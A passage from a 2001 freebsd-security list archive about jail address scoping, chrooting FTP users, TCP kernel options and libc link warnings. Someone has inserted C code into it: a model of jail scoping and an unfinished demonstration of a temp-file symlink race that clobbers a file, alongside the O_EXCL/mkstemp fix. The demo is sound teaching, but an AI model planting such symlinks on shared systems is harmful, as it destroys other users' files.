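 * User-space model of jail(2) address scoping as described on the
 * freebsd-security list for 4.3-STABLE.  Illustrative only: this is not
 * the kernel's prison_ip() code, and the addresses are made up.
 */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JAIL_MAX_IPS 8

struct jail {
    const char *name;
    uint32_t ips[JAIL_MAX_IPS];   /* host byte order; ips[0] is the primary */
    int nips;                     /* 1 models 4.3-STABLE, >1 the multi-IP patch */
};

/* Fill in a jail from dotted-quad strings; returns 0 on success, -1 on bad input. */
int jail_init(struct jail *j, const char *name, const char **addrs, int n)
{
    struct in_addr a;
    if (n < 1 || n > JAIL_MAX_IPS)
        return -1;
    j->name = name;
    j->nips = 0;
    for (int i = 0; i < n; i++) {
        if (inet_pton(AF_INET, addrs[i], &a) != 1)
            return -1;
        j->ips[j->nips++] = ntohl(a.s_addr);
    }
    return 0;
}

/*
 * Apply jail scoping to the address a process asked to bind or connect from.
 * Writes the effective address (host order) to *out and returns 0, or
 * returns -1 with errno = EADDRNOTAVAIL when the address is outside the jail.
 * A NULL jail means the process is not jailed and the address passes through.
 */
int jail_scope_addr(const struct jail *j, uint32_t requested, uint32_t *out)
{
    if (j == NULL || j->nips == 0) {
        *out = requested;
        return 0;
    }
    /* Wildcard and 127.0.0.1 both become the jail's primary address, so a
     * daemon that binds INADDR_ANY gets ips[0] only, the inetd caveat. */
    if (requested == INADDR_ANY || requested == INADDR_LOOPBACK) {
        *out = j->ips[0];
        return 0;
    }
    /* An explicitly chosen jail address is allowed as-is (the Apache case). */
    for (int i = 0; i < j->nips; i++) {
        if (j->ips[i] == requested) {
            *out = requested;
            return 0;
        }
    }
    errno = EADDRNOTAVAIL;       /* anything else is not this jail's to bind */
    return -1;
}

/* Dotted-quad convenience wrapper; buf receives the effective address or "". */
int jail_scope_str(const struct jail *j, const char *req, char *buf, size_t len)
{
    struct in_addr a;
    uint32_t eff;
    if (inet_pton(AF_INET, req, &a) != 1)
        return -1;
    if (jail_scope_addr(j, ntohl(a.s_addr), &eff) != 0) {
        if (len)
            buf[0] = '\0';
        return -1;
    }
    a.s_addr = htonl(eff);
    return inet_ntop(AF_INET, &a, buf, len) ? 0 : -1;
}

int main(void)
{
    /* Made-up two-address jail standing in for the multiple-IP patch. */
    const char *addrs[] = { "192.0.2.10", "192.0.2.11" };
    const char *requests[] = { "0.0.0.0", "127.0.0.1", "192.0.2.11", "198.51.100.1" };
    struct jail j;
    char buf[INET_ADDRSTRLEN];

    if (jail_init(&j, "www", addrs, 2) != 0)
        return 1;
    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        if (jail_scope_str(&j, requests[i], buf, sizeof buf) == 0)
            printf("bind %-14s -> %s\n", requests[i], buf);
        else
            printf("bind %-14s -> refused (EADDRNOTAVAIL)\n", requests[i]);
    }
    return 0;
}
```

Only 127.0.0.1 itself is rewritten in this model, matching the message; any other 127/8 address falls into the refused path, which is the kind of "expecting to use 127.0.0.1 in specific ways" breakage Watson alludes to. Running the block prints the wildcard and loopback requests mapped to 192.0.2.10, the explicit 192.0.2.11 bind passing through, and the foreign address refused.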
Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services

From owner-freebsd-security Wed May 9 0: 8:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailo.vtcif.telstra.com.au (mailo.vtcif.telstra.com.au [202.12.144.17]) by hub.freebsd.org (Postfix) with ESMTP id 5AC7237B422 for ; Wed, 9 May 2001 00:08:36 -0700 (PDT) (envelope-from Sami.Gounder@team.telstra.com) Received: (from uucp@localhost) by mailo.vtcif.telstra.com.au (8.8.2/8.6.9) id RAA24875 for ; Wed, 9 May 2001 17:08:34 +1000 (EST) Received: from maili.vtcif.telstra.com.au(202.12.142.17) via SMTP by mailo.vtcif.telstra.com.au, id smtpdqyC_4_; Wed May 9 17:08:07 2001 Received: (from uucp@localhost) by maili.vtcif.telstra.com.au (8.8.2/8.6.9) id RAA07572 for ; Wed, 9 May 2001 17:08:07 +1000 (EST) Received: from localhost(127.0.0.1), claiming to be "mail.cdn.telstra.com.au" via SMTP by localhost, id smtpd0ccG5F; Wed May 9 17:07:43 2001 Received: from ntmsg0028.corpmail.telstra.com.au (ntmsg0028.corpmail.telstra.com.au [192.168.174.24]) by mail.cdn.telstra.com.au (8.8.2/8.6.9) with ESMTP id RAA20787 for ; Wed, 9 May 2001 17:07:42 +1000 (EST) Received: by ntmsg0028.corpmail.telstra.com.au with Internet Mail Service (5.5.2650.21) id ; Wed, 9 May 2001 17:06:27 +1000 Message-ID: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> From: "Gounder, Sami [IBM GSA]" To: "'freebsd-security@FreeBSD.org'" Subject: Preventing FTP user accessing other directories Date: Wed, 9 May 2001 17:06:25 +1000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

We need to set up FTP for users to copy files from our UNIX box.
Is there a way to restrict each user to a directory and sub-directories below it without removing OTHERS permission everywhere else?

Sami

From owner-freebsd-security Wed May 9 0:23: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 7484537B422 for ; Wed, 9 May 2001 00:23:00 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (195.161.98.236.morning.ru [195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id PAA08914; Wed, 9 May 2001 15:22:33 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Wed, 9 May 2001 15:25:31 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <6693506465.20010509152531@morning.ru> To: "Gounder, Sami [IBM GSA]" Cc: "'freebsd-security@FreeBSD.org'" Subject: Re: Preventing FTP user accessing other directories In-Reply-To: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> References: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Are you aware of CHROOT capabilities? Lots of FTP daemons can lock a user inside a chrooted area... ProFTPd also allows easy configuration similar to Apache syntax rules for every dir and so on.

> We need to set up FTP for users to copy files from our UNIX box. Is there a
> way to restrict each user to a directory and sub-directories below it
> without removing OTHERS permission everywhere else?
> Sami

-- Igor mailto:poige@morning.ru

From owner-freebsd-security Wed May 9 0:25:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from unix-shells.com (handi6-212-144-244-007.arcor-ip.net [212.144.244.7]) by hub.freebsd.org (Postfix) with ESMTP id 22C5637B422 for ; Wed, 9 May 2001 00:25:35 -0700 (PDT) (envelope-from bjoern@loenneker.com) Received: (from root@localhost) by unix-shells.com (8.11.3/8.11.3) id f497PNL57845; Wed, 9 May 2001 09:25:23 +0200 (CEST) (envelope-from bjoern@loenneker.com) Received: from unix-shells.com (nobody@localhost [127.0.0.1]) by unix-shells.com (8.11.3/8.11.3av) with ESMTP id f497PK357837; Wed, 9 May 2001 09:25:20 +0200 (CEST) (envelope-from bjoern@loenneker.com) Message-ID: <84388618.989393120543.JavaMail.nobody@localhost> Date: Wed, 9 May 2001 09:25:20 +0200 (CEST) From: Björn Lönneker To: Sami.Gounder@team.telstra.com Subject: RE: Preventing FTP user accessing other directories Cc: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=84390859.989393120398.JavaMail.nobody.unix-shells.com X-Mailer: WebMail/Java v0.7.6, SendMessage plugin v1.8 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

You wrote:
> We need to set up FTP for users to copy files from our UNIX box. Is there a
> way to restrict each user to a directory and sub-directories below it
> without removing OTHERS permission everywhere else?
> Sami

-- you can restrict users to their home directories by adding their group name to /etc/ftpchroot.
If your users are, for example, all part of the "users" group, put "@users" into /etc/ftpchroot.

From owner-freebsd-security Wed May 9 0:26: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 16E4637B422 for ; Wed, 9 May 2001 00:26:02 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 10712 invoked by uid 1000); 9 May 2001 07:25:31 -0000 Date: Wed, 9 May 2001 10:25:31 +0300 From: Peter Pentchev To: "Gounder, Sami [IBM GSA]" Cc: Igor Podlesny , "'freebsd-security@FreeBSD.org'" Subject: Re: Preventing FTP user accessing other directories Message-ID: <20010509102531.A3400@ringworld.oblivion.bg> Mail-Followup-To: "Gounder, Sami [IBM GSA]" , Igor Podlesny , "'freebsd-security@FreeBSD.org'" References: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> <6693506465.20010509152531@morning.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <6693506465.20010509152531@morning.ru>; from poige@morning.ru on Wed, May 09, 2001 at 03:25:31PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, May 09, 2001 at 03:25:31PM +0700, Igor Podlesny wrote:
>
> Are you aware of CHROOT capabilities? Lots of FTP daemons can lock a
> user inside a chrooted area... ProFTPd also allows easy configuration
> similar to Apache syntax rules for every dir and so on.
>
> > We need to set up FTP for users to copy files from our UNIX box. Is there a
> > way to restrict each user to a directory and sub-directories below it
> > without removing OTHERS permission everywhere else?
If you're using the FTP server that comes with FreeBSD (/usr/libexec/ftpd), do 'man ftpd' and look for 'chroot' or '/etc/ftpchroot'.

G'luck, Peter

-- Do you think anybody has ever had *precisely this thought* before?

From owner-freebsd-security Wed May 9 2:29:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by hub.freebsd.org (Postfix) with ESMTP id 1402637B42C for ; Wed, 9 May 2001 02:29:17 -0700 (PDT) (envelope-from lirandb@netvision.net.il) Received: from a ([213.57.143.184]) by alpha.netvision.net.il (8.9.3/8.8.6) with SMTP id MAA19918 for ; Wed, 9 May 2001 12:29:14 +0300 (IDT) Message-ID: <002601ba1df7$4da07940$b88f39d5@a> From: "Retal" To: Subject: Some Kernel options Date: Tue, 9 May 1995 12:26:09 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0023_01BA1E08.10F6EEA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I could not have wondered but.. Is it only me, or are other people compiling their kernel with these options:

options KBD_INSTALL_CDEV # install a CDEV entry in /dev
options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN
options TCP_RESTRICT_RST #restrict emission of TCP RST
options ICMP_BANDLIM

Do those options have any effect? I have used them for months but I haven't seen any difference between my other machines.

BTW: if I add TCP_DROP_SYNFIN, should it affect the setup options in my firewall? If so, how?
Thanks,
-Liran Dahan- [lirandb@netvision.net.il]
From owner-freebsd-security Wed May 9 2:34:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id 8A3F337B50E for ; Wed, 9 May 2001 02:34:10 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D890C678BA; Wed, 9 May 2001 02:34:09 -0700 (PDT) Date: Wed, 9 May 2001 02:34:09 -0700 From: Kris Kennaway To: Retal Cc: freebsd-security@FreeBSD.ORG Subject: Re: Some Kernel options Message-ID: <20010509023409.A33253@xor.obsecurity.org> References: <002601ba1df7$4da07940$b88f39d5@a> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a>; from lirandb@netvision.net.il on Tue, May 09, 1995 at 12:26:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, May 09, 1995 at 12:26:09PM +0200, Retal wrote:
Fix your clock  ^^^^

> I could not have wondered but.. Is it only me, or are other people compiling
> their kernel with these options:
> options KBD_INSTALL_CDEV # install a CDEV entry in /dev
> options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN
> options TCP_RESTRICT_RST #restrict emission of TCP RST
> options ICMP_BANDLIM
>
> Do those options have any effect? I have used them for months but I haven't
> seen any difference between my other machines.

Um, you're not going to see the effect of these options unless you look. They work as intended - it seems you're expecting them to make some magical difference to your machine, which isn't the case.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6+Q8RWry0BWjoQKURAgfmAJ9IjcLNn6Mji6NLJmy8SVDnbDUywwCeKU8l
BwyvuogOQxIg1oINsStukbE=
=yjaJ
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed May 9 2:43:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id 06B7437B422 for ; Wed, 9 May 2001 02:43:16 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by probity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xQV0-000EN8-00 for security@freebsd.org; Wed, 9 May 2001 10:43:14 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f499hD147381 for security@freebsd.org; Wed, 9 May 2001 10:43:13 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 10:43:13 +0100 From: Rasputin To: security@freebsd.org Subject: setkey(3) not present in the system Message-ID: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Reply-To: Rasputin Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Morning all. I'm trying to port a WAP gateway to BSD, I've managed to get it to roll a binary, but want to quench these warnings before I submit it. (see bottom) I know how to sort out mktemp() and gets(), anyone know where f_prealloc() lives? Anyway, the main reason I mailed this list is the 4 crypto functions don't seem to be implemented on my box - is that just me?
If so, how do I get them into the C library? I'm not a USA resident, and used to have a line saying that in make.conf back in 4.0-RELEASE. Since then I've removed the line. Anybody know where I can get these functions? Thanks.

/usr/lib/libc.so: WARNING! setkey(3) not present in the system!
/usr/lib/libc.so: warning: this program uses gets(), which is unsafe.
/usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp()
/usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
/usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
/usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp()
/usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.
/usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!

-- When God endowed human beings with brains, He did not intend to guarantee them. Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Wed May 9 2:57:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from rafiu.psi-domain.co.uk (rafiu.psi-domain.co.uk [212.87.84.199]) by hub.freebsd.org (Postfix) with ESMTP id 7856E37B422 for ; Wed, 9 May 2001 02:57:15 -0700 (PDT) (envelope-from heckfordj@psi-domain.co.uk) Received: from smtp.psi-domain.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by rafiu.psi-domain.co.uk (Postfix) with SMTP id 629B0402EC6 for ; Wed, 9 May 2001 10:52:38 +0100 (BST) Date: Wed, 9 May 2001 11:55:58 +0100 From: Jamie Heckford To: freebsd-security@freebsd.org Subject: Re: Some Kernel options Message-ID: <20010509115558.C4995@storm.psi-domain.co.uk> Reply-To: heckfordj@psi-domain.co.uk References: <002601ba1df7$4da07940$b88f39d5@a> <20010509023409.A33253@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <20010509023409.A33253@xor.obsecurity.org>; from kris@obsecurity.org on Wed, May 09, 2001 at 10:34:09 +0100 X-Mailer: Balsa 1.1.1 Lines: 51 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Some can help against portscans and DoS attacks. Not really useful if you're not connected to a publicly addressable IP address, or if you're not on a Medium/Large LAN with people on the network who may possibly attack your box.

Jamie

On 2001.05.09 10:34 Kris Kennaway wrote:
> On Tue, May 09, 1995 at 12:26:09PM +0200, Retal wrote:
>
> Fix your clock ^^^^
>
> > I could not have wondered but.. Is it only me, or are other people compiling
> > their kernel with these options:
> > options KBD_INSTALL_CDEV # install a CDEV entry in /dev
> > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN
> > options TCP_RESTRICT_RST #restrict emission of TCP RST
> > options ICMP_BANDLIM
> >
> > Do those options have any effect? I have used them for months but I haven't
> > seen any difference between my other machines.
>
> Um, you're not going to see the effect of these options unless you
> look. They work as intended - it seems you're expecting them to make
> some magical difference to your machine, which isn't the case.
>
> Kris
>

-- Jamie Heckford Network Operations Manager Psi-Domain - Innovative Linux Solutions. Ask Us How.
FreeBSD - The power to serve Join our mailing list and stay informed by emailing majordomo@psi-domain.co.uk with the line: subscribe collective ===================================== email: heckfordj@psi-domain.co.uk web: http://www.psi-domain.co.uk/ tel: +44 (0)1737 789 246 fax: +44 (0)1737 789 245 mobile: +44 (0)7866 724 224 =====================================

From owner-freebsd-security Wed May 9 3:39:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id C92C137B422 for ; Wed, 9 May 2001 03:39:38 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id E014F678BA; Wed, 9 May 2001 03:39:31 -0700 (PDT) Date: Wed, 9 May 2001 03:39:31 -0700 From: Kris Kennaway To: Rasputin Cc: security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509033931.A34710@xor.obsecurity.org> References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bg08WKrSYDhXBjb5" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote:
>
> Morning all.
> I'm trying to port a WAP gateway to BSD, I've managed to get it to roll
> a binary, but want to quench these warnings before I submit it.
> (see bottom)

You get these warnings when you link incorrectly against libc. It doesn't mean the program uses these functions.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6+R5iWry0BWjoQKURAhUVAKC5FWY55sXiMxxsmZOwq/Smes4SBACfbXve
+eqcNKedsKWCpkjseNOjC9E=
=X/fu
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed May 9 3:39:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id 6A34737B422 for ; Wed, 9 May 2001 03:39:48 -0700 (PDT) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-213-168-92-247.netcologne.de [213.168.92.247]) by mr200.netcologne.de (Mirapoint) with ESMTP id AFF49586; Wed, 9 May 2001 12:39:46 +0200 (CEST) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.3) with ESMTP id f49AdSP95800; Wed, 9 May 2001 12:39:28 +0200 (CEST) (envelope-from pherman@frenchfries.net) Date: Wed, 9 May 2001 12:39:28 +0200 (CEST) From: Paul Herman To: Rasputin Cc: Subject: Re: setkey(3) not present in the system In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 9 May 2001, Rasputin wrote:
> Anybody know where I can get these functions?
> Thanks.
>
> /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> /usr/lib/libc.so: warning: this program uses gets(), which is unsafe.
> /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp()
> /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp()
> /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.
> /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!

Just follow your nose, it always knows! :-) des_setkey(3) manpage mentions -lcipher. Looks like it's in /usr/src/secure/lib/libcipher

-Paul.

From owner-freebsd-security Wed May 9 3:49:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id 2EF3F37B422 for ; Wed, 9 May 2001 03:49:10 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xRWm-000HnE-00; Wed, 9 May 2001 11:49:08 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f49An7c49121; Wed, 9 May 2001 11:49:07 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 11:49:07 +0100 From: Rasputin To: Paul Herman Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509114907.A48960@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from pherman@frenchfries.net on Wed, May 09, 2001 at 12:39:28PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

* Paul Herman [010509 11:41]:
> On Wed, 9 May 2001, Rasputin wrote:
>
> > Anybody know where I can get these functions?
> > Thanks.
> >
> > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
> Just follow your nose, it always knows! :-)
> des_setkey(3) manpage mentions -lcipher. Looks like it's in

If you could see the size of my nose, you'd be even more amazed I missed this.. Someone else mentioned -lcipher, I'll throw that in and give it a whirl. Thanks.

Incidentally, (and OT-ly), this is my favourite error message...
> /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.

-- Things will be bright in P.M. A cop will shine a light in your face. Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Wed May 9 3:51:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4BAD637B422 for ; Wed, 9 May 2001 03:51:24 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 44307 invoked by uid 1000); 9 May 2001 10:50:52 -0000 Date: Wed, 9 May 2001 13:50:52 +0300 From: Peter Pentchev To: Rasputin Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509135052.A44191@ringworld.oblivion.bg> Mail-Followup-To: Rasputin , security@freebsd.org References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote:
>
> Morning all.
> I'm trying to port a WAP gateway to BSD, I've managed to get it to roll > a binary, but want to quench these warnings before I submit it. > (see bottom) > > I know how to sort out mktemp() and gets(), anyone know where f_prealloc() > lives? [roam@ringworld:v0 /usr/lib]$ nm -ao *.a | fgrep f_prealloc libc.a:findfp.o:00000154 T f_prealloc libc_p.a:findfp.po:00000160 T f_prealloc libc_pic.a:findfp.So:00000180 T f_prealloc libc_r.a:findfp.o:00000160 T f_prealloc libc_r_p.a:findfp.po:0000016c T f_prealloc [roam@ringworld:v0 /usr/lib]$ Looks like it's in libc. The /usr/src/lib/libc/stdio/findfp.c file, though, contains comments which seem to indicate that f_prealloc() is an internal stdio function, not intended to be used by anything other than stdio. > Anyway, the main reason I mailed this list is the 4 crypto functions > don't seem to be implemented on my box - is that just me? > If so, how do I get them into the c library? > I'm not a USA resident , and used to have a line saying that in make.conf back in > 4.0-RELEASE. Since then I've removed the line. > > Anybody know where I can get these functions? Ever tried man 3 setkey? :) It mentions the "FreeSec Crypt Library (libcipher, -lcipher)" as the very first thing after the function name :) G'luck, Peter -- This would easier understand fewer had omitted. 
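The mktemp() and tmpnam() warnings quoted in this thread are not style nags: both hand back a file name that the program then opens in a second step, and anything that can write to the directory in between can plant a symlink at that name. The following is an added example, not code from this thread or from the WAP gateway being ported. It reproduces that race deterministically (the "attacker" is the same process, planting the link between the two steps), then shows the two fixes libc is pointing at: open with O_CREAT|O_EXCL, or let mkstemp() do it. The only assumption is a writable /tmp; the victim file contents and the scratch directory are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example, not code from the thread: the race behind the
 * "mktemp()/tmpnam() possibly used unsafely; consider using mkstemp()"
 * warning, and the O_EXCL / mkstemp() fix. Everything happens inside a
 * private mkdtemp() directory; assumption: /tmp is writable. */

#define VICTIM_DATA "important data\n"
#define VICTIM_LEN  (sizeof VICTIM_DATA - 1)

/* Scratch dir, a victim file, and the guessable name mktemp()-style code picks. */
static int setup(char *dir, char *victim, char *tmpname)
{
    strcpy(dir, "/tmp/tmprace.XXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, PATH_MAX, "%s/victim.txt", dir);
    snprintf(tmpname, PATH_MAX, "%s/app.tmp", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, VICTIM_DATA, VICTIM_LEN);
    close(fd);
    return n == (ssize_t)VICTIM_LEN ? 0 : -1;
}

static off_t file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? st.st_size : -1;
}

static void cleanup(const char *dir, const char *victim, const char *tmpname)
{
    unlink(tmpname);
    unlink(victim);
    rmdir(dir);
}

/* Run the race once: the attacker plants a symlink at the predicted name, then
 * the application opens that name with `flags`. Returns the fd, -1 with errno
 * set if the open failed, or -2 if the setup itself failed. */
static int race(int flags, char *dir, char *victim, char *tmpname)
{
    if (setup(dir, victim, tmpname) != 0)
        return -2;
    if (symlink(victim, tmpname) != 0) {            /* attacker wins the window */
        cleanup(dir, victim, tmpname);
        return -2;
    }
    return open(tmpname, flags, 0600);              /* application "creates" its temp file */
}

/* Unsafe pattern (name, then open without O_EXCL): the open follows the planted
 * link and O_TRUNC empties the victim. Returns 1 if the victim was clobbered. */
int unsafe_pattern_clobbers_victim(void)
{
    char dir[32], victim[PATH_MAX], tmpname[PATH_MAX];
    int fd = race(O_WRONLY | O_CREAT | O_TRUNC, dir, victim, tmpname);
    if (fd == -2)
        return -1;
    if (fd >= 0)
        close(fd);
    int clobbered = file_size(victim) == 0;
    cleanup(dir, victim, tmpname);
    return clobbered;
}

/* Safe pattern: O_CREAT|O_EXCL fails with EEXIST when anything, a symlink
 * included, already sits at the name. Returns 1 if refused and victim intact. */
int safe_pattern_refuses_symlink(void)
{
    char dir[32], victim[PATH_MAX], tmpname[PATH_MAX];
    int fd = race(O_WRONLY | O_CREAT | O_EXCL, dir, victim, tmpname);
    if (fd == -2)
        return -1;
    int refused = fd < 0 && errno == EEXIST;
    if (fd >= 0)
        close(fd);
    int intact = file_size(victim) == (off_t)VICTIM_LEN;
    cleanup(dir, victim, tmpname);
    return refused && intact;
}

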